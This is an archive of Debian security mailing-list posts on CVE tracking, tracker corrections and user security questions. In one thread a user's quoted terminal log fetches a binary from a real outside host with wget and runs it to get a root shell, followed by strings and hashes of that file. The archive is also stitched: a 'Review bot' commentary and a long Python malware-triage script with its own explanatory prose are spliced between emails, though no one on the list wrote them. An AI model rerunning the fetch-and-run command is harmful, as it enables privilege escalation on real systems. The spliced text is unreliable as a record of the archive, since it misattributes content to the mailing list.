Re: Switching the tracker to git
On Sun, Sep 14, 2014 at 07:06:46PM -0400, micah wrote:
> My guess is that the only reason that subversion is still used is inertia
> and that people would be happier with git. However, I'm curious to know
> if anyone thinks otherwise?

In my experience Git also takes more time per commit if we are talking about making branches and/or pull requests. What would be the actual benefits of moving to Git? I'm not talking about some minor speed improvements. Please also note that there are hooks in SVN currently and I'm not sure if those can be migrated to Git. I'm more than happy to discuss this case in detail and even help to implement it if/when the team starts to move in that direction.

---
Henri Salo

-- To UNSUBSCRIBE, email to debian-security-tracker-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/20140915053315.ga19...@kludge.henri.nerv.fi
Re: Testing needed: openjdk7 update for stable-security
On Fri, Jul 12, 2013 at 10:00:49AM +0300, Georgi Naplatanov wrote:
> Anyway I'm going to test OpenJDK 7u25 with Eclipse 4.2.2 this weekend.
> I'm not sure that it will be valuable, but that is what I use daily.
> I have been happy with OpenJDK 7 from stable so far.
>
> Best regards
> Georgi

Why haven't you been happy with it?

---
Henri Salo
Re: cpe ids and package names
On Wed, Nov 14, 2012 at 04:46:53PM +0100, Quentin Poirier wrote:
> http://anonscm.debian.org/viewvc/secure-testing/data/CPE/list?view=markup
> [snip]
> So? Would you be interested by a file like this?

I am very interested. I think we (as in the Debian project) should start using CPEs. We probably need some kind of planning session to get ideas listed and some kind of roadmap. You can contact me directly if you want to give me tasks or share ideas etc., but I suggest we keep meeting in IRC some day.

- Henri Salo

ps. not yet Debian Developer

Archive: http://lists.debian.org/20121114174559.ga24...@kludge.henri.nerv.fi
Re: Audit of Debian/Ubuntu for unfixed vulnerabilities because of embedded code copies
On Mon, Jul 02, 2012 at 07:59:26PM +0200, Petter Reinholdtsen wrote:
> [Silvio Cesare]
> > I recently ran the tool and cross referenced identified code copies
> > with Debian's security tracking of affected packages by CVE. I did
> > this for all CVEs in 2010, 2011, and 2012.
>
> This sounds like a job that could become a bit easier if we tagged
> Debian packages with the CPE ids associated with CVEs, to make it
> easier to figure out which Debian packages are affected by a given CVE.
>
> Are you aware of my proposal to do this, mentioned on debian-security
> and also drafted on <URL: http://wiki.debian.org/CPEtagPackagesDep >?
>
> --
> Happy hacking
> Petter Reinholdtsen

Has there been any progress with this project? I am glad to help if there is something I can do. This is needed in my opinion.

- Henri Salo

Archive: http://lists.debian.org/20120929202243.ga12...@kludge.henri.nerv.fi
Re: CVE-2011-1521 - fixed packet
On Thu, Jul 19, 2012 at 12:44:36PM +0200, Arne Wichmann wrote:
> Ok, I just created a fixed version of python2.6 for my own use. Whoever is
> interested can find it at [1] for the time being. If anybody has comments
> or improvements I am also interested.
>
> [1] http://www.saar.de/~aw/debian/python2.6_2.6.6-8.aw1.dsc
>     http://www.saar.de/~aw/debian/python2.6_2.6.6-8.aw1.diff.gz
>     http://www.saar.de/~aw/debian/python2.6_2.6.6-8.aw1_i386.build
>     http://www.saar.de/~aw/debian/python2.6_2.6.6-8.aw1_i386.changes
>     http://www.saar.de/~aw/debian/python2.6_2.6.6-8.aw1_i386.deb
>
> cu
> AW
> --
> [...] If you don't want to be restricted, don't agree to it. If you are
> coerced, comply as much as you must to protect yourself, just don't support
> it. No one can free you but yourself. (crag, on Debian Planet)
> Arne Wichmann (a...@linux.de)

The Debian security tracker currently says:

CVE-2011-1521 (The urllib and urllib2 modules in Python 2.x before 2.7.2 and 3.x ...)
	- python3.1 <removed> (bug #628453)
	- python3.2 3.2-3
	- python2.7 2.7.1-7
	- python2.6 2.6.7-1 (bug #628455)
	- python2.5 <removed>
	- python2.4 <removed>
	NOTE: http://bugs.python.org/issue11662

Bug #628455 is still marked as done. What exactly needs to be done to get this issue closed permanently? :)

- Henri Salo

Archive: http://lists.debian.org/20120724071645.gb20...@kludge.henri.nerv.fi
Bug#681524: closed by Michael Gilbert mgilb...@debian.org (Re: Bug#681524: security-tracker: DSA-2511-1 vs. tracker)
On Tue, Jul 17, 2012 at 06:49:40PM +0200, Francesco Poli wrote:
> On Tue, 17 Jul 2012 01:09:03 +0000 Debian Bug Tracking System wrote:
> > On Fri, Jul 13, 2012 at 5:28 PM, Francesco Poli (wintermute) wrote:
> > > [...] DSA-2511-1 [...] says that CVE-2012-386[4-7] are fixed in sid by
> > > puppet/2.7.18-1, but the tracker seems to disagree [...]
> >
> > Tracker data has been corrected. Thanks!
> >
> > Mike
>
> Thanks to you.
>
> But is CVE-2012-3408 also fixed in squeeze (security) and sid? The DSA
> does not mention it and I cannot find it in the changelogs. I assume the
> tracker is right, but it looks strange that CVE-2012-3408 is associated
> with DSA-2511-1, while the DSA itself does not mention CVE-2012-3408...
>
> --
> http://www.inventati.org/frx/frx-gpg-key-transition-2010.txt
> New GnuPG key, see the transition document!
> . Francesco Poli .
> GnuPG key fpr == CA01 1147 9CD2 EFDF FB82 3925 3E1C 27E1 1F69 BFFE

I added that information to the tracker as I received misinformation from one of the package maintainers. I will fix it today. CVE-2012-3408 hasn't been fixed in Debian versions. You should also read http://puppetlabs.com/security/cve/cve-2012-3408/ and sorry for the confusion.

- Henri Salo

Archive: http://lists.debian.org/20120717183339.ga5...@kludge.henri.nerv.fi
Bug#681524: closed by Michael Gilbert mgilb...@debian.org (Re: Bug#681524: security-tracker: DSA-2511-1 vs. tracker)
On Tue, Jul 17, 2012 at 02:47:49PM -0400, Michael Gilbert wrote:
> Data entered into the tracker needs to be reliable. If you have not
> personally checked CVE references for each individual issue against the
> patches present in the tracker, then you cannot claim that the problem
> has been fixed. Leave those issues unfixed until someone who is willing
> to do the appropriate research has time to review the issue. Otherwise
> we're leaving issues unfixed and fooling ourselves into thinking they are
> fixed, which is just so incredibly wrong.
>
> Best wishes,
> Mike

I got this information from the package maintainer (Stig Sandbeck Mathisen <s...@d.org>):

> That issue is fixed in the 2.7.18-1 upload to unstable and in the
> 2.6.2-5+squeeze6 upload to stable-security, along with CVE-2012-3864,
> CVE-2012-3865, CVE-2012-3866 and CVE-2012-3867 which those uploads mention.

Which he later corrected in our email discussion:

> It was fixed by Puppet Labs in revision ab9150b by deprecating it in
> 2.7.18 (by logging a warning message), and removing it in 3.x. I was of
> the impression that this made it into the squeeze security release, but I
> was mistaken. Sorry. :/
>
> Puppet Labs sees it as a low-risk security vulnerability
> (http://puppetlabs.com/security/cve/cve-2012-3408/). In order to be
> vulnerable, you have to:
>
> * Explicitly configure certname=ipaddress in puppet.conf. The default is
>   the fully qualified domain name.
> * Allow others access to the network your agent runs on, as well as
>   taking its IP address, or using man-in-the-middle techniques to
>   impersonate this IP address.

I could verify every issue by myself, but is that really needed in cases where the package maintainer gives this information, as some issues are very time consuming to verify? This was a human mistake and I am sorry. I hope trying to update the security tracker and report bugs is not incredibly wrong. I asked on #debian-security how to go forward with this case as the DSA did not contain CVE-2012-3408 and I was following those instructions.

- Henri Salo

Archive: http://lists.debian.org/20120717191850.ge5...@kludge.henri.nerv.fi
Re: python 2.6.6 - python 2.6.8
On Mon, Jun 25, 2012 at 09:49:08AM +0200, Marc Haber wrote:
> Hi,
>
> a colleague pointed me to the release notes of python 2.6.8, where the
> following security issues are listed as being fixed:
>
> * oCERT-2011-003, CVE-2012-1150, hash collision denial of service
> * CVE-2012-0876, pyexpat hash randomization
> * CVE-2012-0845, SimpleXMLRPCServer denial of service
> * CVE-2011-3389, disabling of the CBC IV attack countermeasure in the
>   _ssl module
>
> The python 2.6.8+squeeze release that I have on my squeeze systems
> doesn't mention any CVE numbers. Does this mean that those issues have
> not been addressed (yet) in Debian? Is the security team working on
> backporting those fixes?
>
> Greetings
> Marc

You can see the status of security vulnerabilities in the Debian security tracker, which includes bug numbers and so on. For example http://security-tracker.debian.org/tracker/CVE-2012-1150

- Henri Salo

Archive: http://lists.debian.org/20120625114557.ga15...@lakka.kapsi.fi
Re: Weekly external check
On Tue, May 22, 2012 at 06:07:33PM +0200, Moritz Muehlenhoff wrote:
> On Tue, May 22, 2012 at 06:42:04AM +0000, Raphael Geissert wrote:
> > CVE-2011-3102: TODO: check
> > CVE-2012-2130: RESERVED
> > CVE-2012-2373: RESERVED
> > CVE-2012-2374: RESERVED
> > CVE-2012-2375: RESERVED
> > CVE-2012-2625: RESERVED
> > --
> > The output might be a bit terse, but the above ids are known elsewhere,
> > check the references in the tracker.
> > The second part indicates the status of that id in the tracker at the
> > moment the script was run.
>
> This is really nice. Shall we crank up the interval to daily runs?
>
> Cheers,
> Moritz

Could we also list the references from the tracker (NOTEs) automatically, and also what is elsewhere?

- Henri Salo

Archive: http://lists.debian.org/20120522162526.ga24...@kludge.henri.nerv.fi
Updates to CVE-2012-0882
Hello,

CVE-2012-0882 does not have any information in the tracker: http://security-tracker.debian.org/tracker/CVE-2012-0882

Related links:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0882
https://bugzilla.redhat.com/show_bug.cgi?id=789141
https://access.redhat.com/security/cve/CVE-2012-0882
http://seclists.org/oss-sec/2012/q1/399
https://lists.immunityinc.com/pipermail/canvas/2012-February/11.html
https://lists.immunityinc.com/pipermail/canvas/2012-February/14.html
http://partners.immunityinc.com/movies/VD-MySQL-5_5_20.mov

Could someone update the tracker data? Thank you.

- Henri Salo

Archive: http://lists.debian.org/20120316072819.gc17...@kludge.henri.nerv.fi
Re: Vulnerable PHP version according to nessus
On Wed, Dec 28, 2011 at 12:53:13PM +0000, Dave Henley wrote:
> Thanks, I checked the CVEs against the changelogs and approx. 50% is
> covered. Is there a website of some sort to check what kind of CVEs have
> been patched? If nessus does not provide a reliable report, what is the
> best next step to take here? Are there any howtos or tutorials on how to
> secure a php installation on a debian system? Any suggestions would be
> very helpful.

Update all software on your www-server. Some useful links:

http://security-tracker.debian.org/tracker/
http://www.debian.org/doc/manuals/securing-debian-howto/

- Henri Salo

Archive: http://lists.debian.org/20111228133153.ga15...@foo.fgeek.fi
Re: Bug#645881: critical update 29 available
On Thu, Dec 01, 2011 at 09:47:53PM +0100, Florian Weimer wrote:
> * Moritz Mühlenhoff:
>
> > Florian, what's the status of openjdk6 for stable/oldstable?
>
> I've released the pending update for squeeze. lenny will eventually
> follow, and so will the pending updates for squeeze, but judging by my
> past performance, it will take a while.
>
> If someone else wants to work on these updates, I'll gladly share what
> I've learnt about the packaging.

I am happy to help in any way I can, but I have no Debian hat nor status. Is there something I could help with?

- Henri Salo

Archive: http://lists.debian.org/20111201215307.gd29...@foo.fgeek.fi
gdb: CVE-2011-4355 arbitrary code execution via .debug_gdb_scripts
http://seclists.org/oss-sec/2011/q4/424

Is some package of Debian affected?

Best regards,
Henri Salo

Archive: http://lists.debian.org/2028190722.ga31...@foo.fgeek.fi
www.debian.org: Broken links on http://www.debian.org/doc/manuals/securing-debian-howto/ch12.en.html
Package: www.debian.org
Severity: normal

*** Please type your report below this line ***

12.1.3:
Part: "for example, the Common Criteria."
Link: http://niap.nist.gov/cc-scheme/st/

12.3.15:
1) Part: "Security Contact key (key ID 0x363CCD95)."
   Link: http://pgpkeys.pca.dfn.de:11371/pks/lookup?search=0x363CCD95%5C%7C[amp%20]%5C%7Cop=vindex
2) Part: "See also the PGP/GPG keys for the security team."
   Link: http://www.debian.org/security/keys.txt

12.3.23:
Part: "(available at http://ftp-master.debian.org/ziyi_key_2006.asc, substitute 2006 for the current year"
Link: http://ftp-master.debian.org/ziyi_key_2006.asc

Also: http://www.debian.org/security/faq
Broken link: http://pgpkeys.pca.dfn.de/pks/lookup?search=0x68B64E0D&op=vindex

-- System Information:
Debian Release: 6.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash

Archive: http://lists.debian.org/20110804101217.ga25...@foo.fgeek.fi
syslog-ng: dos / TEMP-0000000-0999A8
Could issue TEMP-0000000-0999A8 [1] be the same as #457334 [2] "CVE-2007-6437 prone to denial of service attack"? Issue #457334 was reported Fri, 21 Dec 2007 16:54:04 UTC, and TEMP-0000000-0999A8 seems to have been committed to CVE/list as [3]:

CVE-2006-XXXX [syslog-ng dos]
	- syslog-ng 2.0rc1-2 (low)
	[sarge] - syslog-ng <not-affected> (Vulnerable code not present)

There is a DSA commit done at Wed Jan 16 08:10:07 2008 UTC [4], which fixes #457334. The upstream patch for #457334 is:
http://git.balabit.hu/?p=bazsi/syslog-ng-2.0.git;a=commitdiff;h=3126ebad217e7fd6356f4733ca33f571aa87a170

1: http://security-tracker.debian.org/tracker/TEMP-0000000-0999A8
2: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=457334
3: http://anonscm.debian.org/viewvc/secure-testing?view=revision&revision=4493
4: http://anonscm.debian.org/viewvc/secure-testing/data/DSA/list?r1=7935&r2=7934&pathrev=7935

Best regards,
Henri Salo

Archive: http://lists.debian.org/20110804091341.gb24...@foo.fgeek.fi
mailscanner: lock/pid file location symlink attack / TEMP-0000000-477739
Is TEMP-0000000-477739 the same as CVE-2010-3095?

Index: data/CVE/list === --- data/CVE/list (revision 15492) +++ data/CVE/list (revision 15493) @@ -2354,7 +2354,7 @@ NOT-FOR-US: SoftX FTP Client 3.3 CVE-2010-3095 [mailscanner incomplete fix for CVE-2008-5313] RESERVED - - mailscanner unfixed (bug #596403) + - mailscanner 4.79.11-2.1 (bug #596403) CVE-2010-3094 (Multiple cross-site scripting (XSS) vulnerabilities in Drupal 6.x ...) {DSA-2113-1} - drupal6 6.18-1 (low; bug #592716)

Links:
http://security-tracker.debian.org/tracker/TEMP-0000000-477739
http://security-tracker.debian.org/tracker/CVE-2008-5313
http://security-tracker.debian.org/tracker/CVE-2010-3095
http://www.mail-archive.com/debian-security-tracker@lists.debian.org/msg01016.html

By the way:

[Date: Sun, 27 Feb 2011 10:33:42 +0000] [ftpmaster: Alexander Reichle-Schmehl]
Removed the following packages from unstable:

mailscanner | 4.79.11-2.2 | source, all
Closed bugs: 531317

--- Reason ---
RoQA; orphaned

Also closing bug(s): 303929 313145 353266 408161 410647 490948 506148 577916 583527 595945 596396 596397 596398 596399 596400 596510 596512 596514 597611 598726 605869 607226 607747 608337

Also closing WNPP bug(s):

Best regards,
Henri Salo

Archive: http://lists.debian.org/20110804123941.ga27...@foo.fgeek.fi
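Review bot: the hunk moves the mailscanner line under CVE-2010-3095 from unfixed to 4.79.11-2.1 while leaving the entry's RESERVED marker and its bug #596403 reference as they were, so whoever applies it should confirm that the 4.79.11-2.1 changelog actually references CVE-2010-3095 or #596403 before treating the bug as closed; and if TEMP-0000000-477739 is the same issue, as the message asks, that TEMP entry should be merged into this CVE line in the same commit, otherwise the tracker keeps one fixed and one open record for a single bug. The mail also notes that mailscanner 4.79.11-2.2 was later removed from unstable, so the fixed-version claim only documents archive history and says nothing about hosts that still have an older mailscanner installed.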
Re: clamav: floating point exception in OLE2 scanner DoS / TEMP-0000000-6B8835
On Mon, Aug 01, 2011 at 06:50:38PM +0300, Henri Salo wrote:
> I think TEMP-0000000-6B8835 is the same as CVE-2007-2650 as seen in
> these links below:
>
> http://security-tracker.debian.org/tracker/TEMP-0000000-6B8835
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2650
> http://www.debian.org/security/2007/dsa-1320
>
> Related information:
> http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.2
> https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2007-2650
>
> Best regards,
> Henri Salo

Or is that a different issue? I can request a CVE identifier for TEMP-0000000-6B8835 if that is not the correct one.

Best regards,
Henri Salo

Archive: http://lists.debian.org/20110801161820.gb21...@foo.fgeek.fi
Broken links in web-page
Page http://www.debian.org/security/audit/tools contains broken links to several locations:

1) "You can find all these modules in his Audit::Source page."
   http://hinterhof.net/~max/audit-perl/ says 404.

2) "Discussion related to closing a particularly problematic piece of code can also be held upon the debian-audit mailing list, just be careful not to make it obvious which program contains the flaw."
   http://shellcode.org/mailman/listinfo/debian-audit says 404.

Best regards,
Henri Salo

Archive: http://lists.debian.org/20110728142258.gg9...@foo.fgeek.fi
Re: libpng CVE-2006-7244/CVE-2009-5063
On Sun, Jul 24, 2011 at 04:54:41PM +0200, Moritz Mühlenhoff wrote:
> Henri Salo <he...@nerv.fi> schrieb:
> > There are two open vulnerabilities in libpng 1.2.27-2+lenny4 as you
> > can see from:
> > http://security-tracker.debian.org/tracker/source-package/libpng
> >
> > The issues I am concerned about are CVE-2006-7244 and CVE-2009-5063.
> > The notes of the issues are: "package libpng is vulnerable; however,
> > the security impact is unimportant.", but I think these aren't
> > unimportant as you can see from here:
> >
> > http://www.openwall.com/lists/oss-security/2011/03/22/7
> > http://www.openwall.com/lists/oss-security/2011/03/28/6
> >
> > Is there a plan to fix these issues? Should I create a bug report?
>
> It's fixed already since 1.2.39-1 for both issues.
>
> Cheers,
> Moritz

Well, the tracker says the status for both CVEs is "vulnerable". Please note that I am talking about oldstable.

Best regards,
Henri Salo

Archive: http://lists.debian.org/20110724150849.ga25...@foo.fgeek.fi
CVE-identifier for dovecot wrong Mail dir permissions
Description: dovecot wrong Mail dir permissions
Temporary name: TEMP-0000000-005740

The CVE identifier for this issue is: CVE-2010-0745

Can you update the security tracker? Thanks.

Best regards,
Henri Salo
DSA-2022-1 / CVE-identifiers
Issue DSA-2022-1 got CVE identifiers:

CVE-2010-1189: a CSS validation issue was discovered which allows editors to display external images in wiki pages.

CVE-2010-1190: a data leakage vulnerability was discovered in thumb.php which affects wikis which restrict access to private files using img_auth.php, or some similar scheme.

References: http://seclists.org/oss-sec/2010/q1/189

Best regards,
Henri Salo
Debian and CVE-2010-0624
Is vulnerability CVE-2010-0624 fixed in Debian packages already?

---
Henri Salo

Archive: http://lists.debian.org/20100310145119.11a01...@foo.fgeek.fi
Re: dt_ssh5
On Wed, 04 Nov 2009 09:30:35 -0500 Bernie Dolan <b...@dolanlane.net> wrote:
> Hi,
>
> I recently became aware of the executable dt_ssh5 in my /tmp
> subdirectory. Seems this is a botnet that is trying brute force attacks
> from my server. Has anybody else seen this?
>
> Thanks for the prompt response.
>
> - When a machine begins to run without human aid, it is time to scrap
> it - whether it be a factory or a government. ~Alexander Chase

Yes, for example the grumpy BSD guy, as you can see from http://bsdly.blogspot.com/2009/10/third-time-uncharmed.html. Could you email me the file? Thanks.

---
Henri Salo
Xpdf Integer overflow
Is an update for the Xpdf vulnerability coming soon for this issue: http://securityreason.com/securityalert/6674

---
Henri Salo
Re: rootkit not found by rkhunter
On Sun, 4 Oct 2009 10:15:35 -0400 Thomas Krichel <kric...@openlib.org> wrote:
> I am running debian testing, 2.6.30 kernel. I have a rootkit installed
> on a bunch of machines that rkhunter does not find. This appears after
> infection with SHV4 / SHV5, which rkhunter found. Here it works to allow
> a non-root user to become root
>
> kric...@fricka:~$ mkdir a
> kric...@fricka:~$ cd a
> kric...@fricka:~/a$ ls -l
> total 0
> kric...@fricka:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:47:42-- http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[==] 6,886 6.88K/s in 1.0s
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> kric...@fricka:~/a$ chmod 777 a
> kric...@fricka:~/a$ ./a
> r...@fricka:~/a#
>
> Here is a situation where it does not work
>
> kric...@chichek:~$ mkdir a
> kric...@chichek:~$ cd a
> kric...@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15-- http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[==] 6,886 37.8K/s in 0.2s
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> kric...@chichek:~/a$ chmod 777 a
> kric...@chichek:~/a$ ./a
> mmap: Permission denied
>
> Does anybody here know how to delete this kit?
>
> Cheers,
>
> Thomas Krichel http://openlib.org/home/krichel
> RePEc:per:1965-06-05:thomas_krichel
> skype: thomaskrichel

This file should at least be deleted from the host.

fg...@foo:~$ file a
a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
fg...@foo:~$ strings a
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
socket
exit
execl
ftruncate
perror
sendfile
unlink
mkstemp
mmap
getpagesize
getgid
getuid
__libc_start_main
GLIBC_2.1
GLIBC_2.0
PTRh
([^_]
[^_]
mmap
socket
mkstemp
unlink
ftruncate
/bin/sh
/tmp/tmp.XX
fg...@foo:~$ md5sum a
b950af01be61a8cbf5d479430738bd18  a
fg...@foo:~$ sha1sum a
639536caea56554406106ad8679115971485f3a2  a
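The `file`/`strings`/`md5sum`/`sha1sum` steps in the reply above are the standard first look at an unknown binary. The script below, added here as an example and not code from the thread, automates that triage: it hashes the file, decodes the ELF header fields that `file` reports, extracts printable strings, and flags the combination of imports (`/bin/sh`, `mmap`, `mkstemp`, `execl`, `unlink`, `/tmp/`) that in the post above distinguishes a local privilege-escalation loader from an ordinary tool. The bytes it runs on are constructed (a minimal ELF32 header followed by similar strings); the indicator list and the "looks like a local exploit" rule are the author's assumptions for the example, not a signature for the specific file in the thread.

```python
import hashlib
import re
import struct

ELF_MAGIC = b'\x7fELF'

# Constructed sample bytes (not the "a" file from the thread): a minimal ELF32
# little-endian i386 executable header, zero-padded to the 52-byte header size,
# followed by the kind of symbol names and paths that strings(1) printed above.
SAMPLE_BINARY = (
    ELF_MAGIC + bytes([1, 1, 1, 0]) + bytes(8)   # e_ident: ELFCLASS32, ELFDATA2LSB, EV_CURRENT, System V ABI
    + struct.pack('<HHI', 2, 3, 1)                # e_type=ET_EXEC, e_machine=EM_386, e_version=1
    + bytes(28)                                   # remaining ELF32 header fields, zeroed
    + b'/lib/ld-linux.so.2\0libc.so.6\0socket\0execl\0mmap\0mkstemp\0unlink\0'
    + b'getuid\0/bin/sh\0/tmp/tmp.XXXXXX\0ab\0'
)

# strings that, together, suggest a local root exploit or loader rather than a benign tool
INDICATORS = {
    '/bin/sh': 'spawns a shell',
    'execl': 'executes another program',
    'mmap': 'maps memory at chosen addresses (typical of kernel-exploit loaders)',
    'mkstemp': 'creates a temporary file',
    'unlink': 'deletes a file (cleanup of a dropped payload)',
    '/tmp/': 'works out of /tmp',
    'socket': 'opens a network socket',
}
E_TYPES = {1: 'ET_REL', 2: 'ET_EXEC', 3: 'ET_DYN', 4: 'ET_CORE'}
E_MACHINES = {3: 'Intel 80386', 40: 'ARM', 62: 'x86-64', 183: 'AArch64'}


def file_hashes(data):
    """md5/sha1 as in the post above, plus sha256 for current lookup services."""
    return {name: hashlib.new(name, data).hexdigest() for name in ('md5', 'sha1', 'sha256')}


def printable_strings(data, min_len=4):
    """Equivalent of strings(1) for runs of printable ASCII of at least min_len bytes."""
    pattern = rb'[\x20-\x7e]{%d,}' % min_len
    return [m.group().decode('ascii') for m in re.finditer(pattern, data)]


def elf_header(data):
    """Decode class, byte order, type and machine from an ELF header; None if not ELF."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = data[4], data[5]
    endian = '<' if ei_data == 1 else '>'
    e_type, e_machine = struct.unpack(endian + 'HH', data[16:20])
    return {
        'class': {1: 'ELF32', 2: 'ELF64'}.get(ei_class, 'unknown'),
        'endian': {1: 'LSB', 2: 'MSB'}.get(ei_data, 'unknown'),
        'type': E_TYPES.get(e_type, 'unknown(%d)' % e_type),
        'machine': E_MACHINES.get(e_machine, 'unknown(%d)' % e_machine),
    }


def triage(data):
    """Static first look at an unknown binary: identity (hashes), format, strings, indicators."""
    strings = printable_strings(data)
    hits = {s: why for s, why in INDICATORS.items() if any(s in x for x in strings)}
    return {
        'hashes': file_hashes(data),
        'elf': elf_header(data),
        'strings': strings,
        'indicators': hits,
        # shell + mmap + temp file together is the profile of a local privilege-escalation loader
        'looks_like_local_exploit': all(k in hits for k in ('/bin/sh', 'mmap', 'mkstemp')),
    }


if __name__ == '__main__':
    import json
    print(json.dumps(triage(SAMPLE_BINARY), indent=2))
```

Run it against a copied sample (never the live file on the compromised host, and never by executing it) and submit the hashes to a lookup service; the hashes are what let other people match the same file. The indicator rule is deliberately conservative: a shell script or a legitimate tool that uses `/tmp` will trip one or two of the strings, which is why the verdict needs all three.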
Re: rootkit not found by rkhunter
On Sun, 4 Oct 2009 12:10:04 -0400 Thomas Krichel <kric...@openlib.org> wrote:
> Michael S Gilbert writes
> > 'apt-get update && apt-get upgrade' followed by a reboot into the new
> > kernel should bring you up to date.
>
> Since I just downloaded the kernel last week I did not really believe
> your advice but I have rebooted and the problem appears gone!
>
> Cheers,
>
> Thomas Krichel http://openlib.org/home/krichel
> RePEc:per:1965-06-05:thomas_krichel
> skype: thomaskrichel

You should use apticron and apt-dater.

---
Henri Salo
Re: Are these scan logs dangerous ?
On Sun, 5 Jul 2009 23:56:36 +0430 a dehqan <dehqa...@gmail.com> wrote:
> In The Name Of God
>
> Thanks a lot for your attention;
> Yes, after rkhunter --propupd, unhide has been ok.
>
> But about the ident service, see
> # chkconfig --level 23 identd off
> identd: unknown service
>
> But port 113 auth is open! So which service has opened port 113?

netstat -lnop|grep :113

---
Henri Salo
Re: Linux infected ?
On Thu, Jan 29, 2009 at 09:04:46AM -0200, Eduardo M KALINOWSKI wrote:
> Rodrigo Hashimoto wrote:
> > Hi,
> >
> > I received a file via e-mail and tried to open it, then iceweasel did
> > nothing. I tried again and I realized iceweasel was trying to use wine
> > to open a .com file. Then I ran the command file and I realized this
> > is a kind of virus for Windows and not Linux. Is this a security risk
> > to my debian lenny?
>
> Even if it was a virus, the most it can do is affect your Wine files of
> the pseudo-Windows installation. Even so, I'm not sure it will be much
> effective. Even if it wrote to the registry an entry to start up
> automatically, I'm not sure Wine honors this.
>
> If you are in doubt, just wipe your wine files (I think they are in
> ~/.wine, but I haven't used Wine in years) and start again.
>
> --
> Eduardo M KALINOWSKI
> edua...@kalinowski.com.br
> http://move.to/hpkb

If you do this, please make sure that there aren't any wine processes running on the system. Those might still be effective.

---
Henri Salo
Amarok CVE-2009-0135 and CVE-2009-0136
There are two different CVE IDs given to amarok's vulnerabilities:

CVE-2009-0135 [1]
CVE-2009-0136 [2]

I believe this DSA [3] is for the first CVE. Is there a need to patch the second one and if yes, what is the status of that process?

1: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0135
2: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0136
3: http://lists.debian.org/debian-security-announce/2009/msg00013.html

---
Henri Salo
Re: Rainbow tables on Linux?
On Thu, Oct 23, 2008 at 12:14:57PM +0200, Johann Spies wrote:
> I have John now running for 74 hours to try and crack one password.
> That is on a 2xquadcore Intel server.
>
> Regards
> Johann

Regular john doesn't use all of your cores, for good reasons. More information can be found at http://www.openwall.com/john/. You should also check their wiki.

- Henri Salo
Re: antivirus for webserver
On Mon, Oct 06, 2008 at 10:10:33AM +0200, Laura Arjona Reina wrote:
> [snip]
> My question is if it is needed to install an antivirus for keeping the
> webserver safe. And if it is needed, which antivirus could I use? I
> thought about clamav but I read about problems keeping up-to-date the
> software shipped with etch-stable.
>
> Thank you
> Laura Arjona

You can use freshclam to keep up with the latest virus database. You can also use ClamAV with PHP scripts if users are sending files to the server. An old ClamAV version should not be a big problem. Of course there are new features, but I'll bet you don't need those in your webserver.

- Henri Salo
Re: Microsoft-IIS/6.0 serves up Debian... WTF!
On Sun, 8 Jun 2008 01:27:06 -0600 JD. Brown <[EMAIL PROTECTED]> wrote:
> On Sun, Jun 8, 2008 at 12:05 AM, <[EMAIL PROTECTED]> wrote:
> > Well, I thought I had seen it all... but this takes the cake.
> >
> > http://ike.egr.msu.edu/debian/pool/
>
> For the heck of it, here is some info about them.
>
> http://toolbar.netcraft.com/site_report?url=http://ike.egr.msu.edu
> http://private.dnsstuff.com/tools/ipall.ch?ip=35.9.37.225&src=ShowIP
>
> It looks like they were running Debian before and switched this month.
> Seems very weird to me.
>
> Regards,

That server looks like lighttpd.

--
Henri Salo
fgeek at fgeek.fi
+358407705733
GPG ID: 2EA46E4F
fp: 14D0 7803 BFF6 EFA0 9998 8C4B 5DFE A106 2EA4 6E4F
Re: secure installation
On Wed, 05 Sep 2007 10:01:37 +0200 Johannes Wiedersich <[EMAIL PROTECTED]> wrote:
> It was installed before etch went stable, though.

That shouldn't affect anything, or at least development tries to avoid that kind of error.

---
Henri Salo
fgeek at fgeek.fi
+358407705733
GPG ID: 2EA46E4F
fp: 14D0 7803 BFF6 EFA0 9998 8C4B 5DFE A106 2EA4 6E4F
Re: secure installation
On Wed, 15 Aug 2007 14:23:06 -0500 Pat <[EMAIL PROTECTED]> wrote:
> There are a few security issues I have noticed about debian's
> installation.
>
> 1) No firewall setup during the install process. As it would be a simple
> matter to run lokkit at the end of the install, I fail to see why this
> is not done.
>
> 2) Rpfilter and tcp syncookies are not enabled by default. Again this is
> a simple correction, and indeed has been mentioned in several open
> source linux guides for years.
>
> 3) Do we really need portmap, inetd, or nfs running by default on our
> workstations?

There shouldn't be any ports open to the internal network after installation. Where do you need a firewall after installation when you can make one, i.e. with iptables?

- Henri 'fgeek' Salo
Re: spooky windows script
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

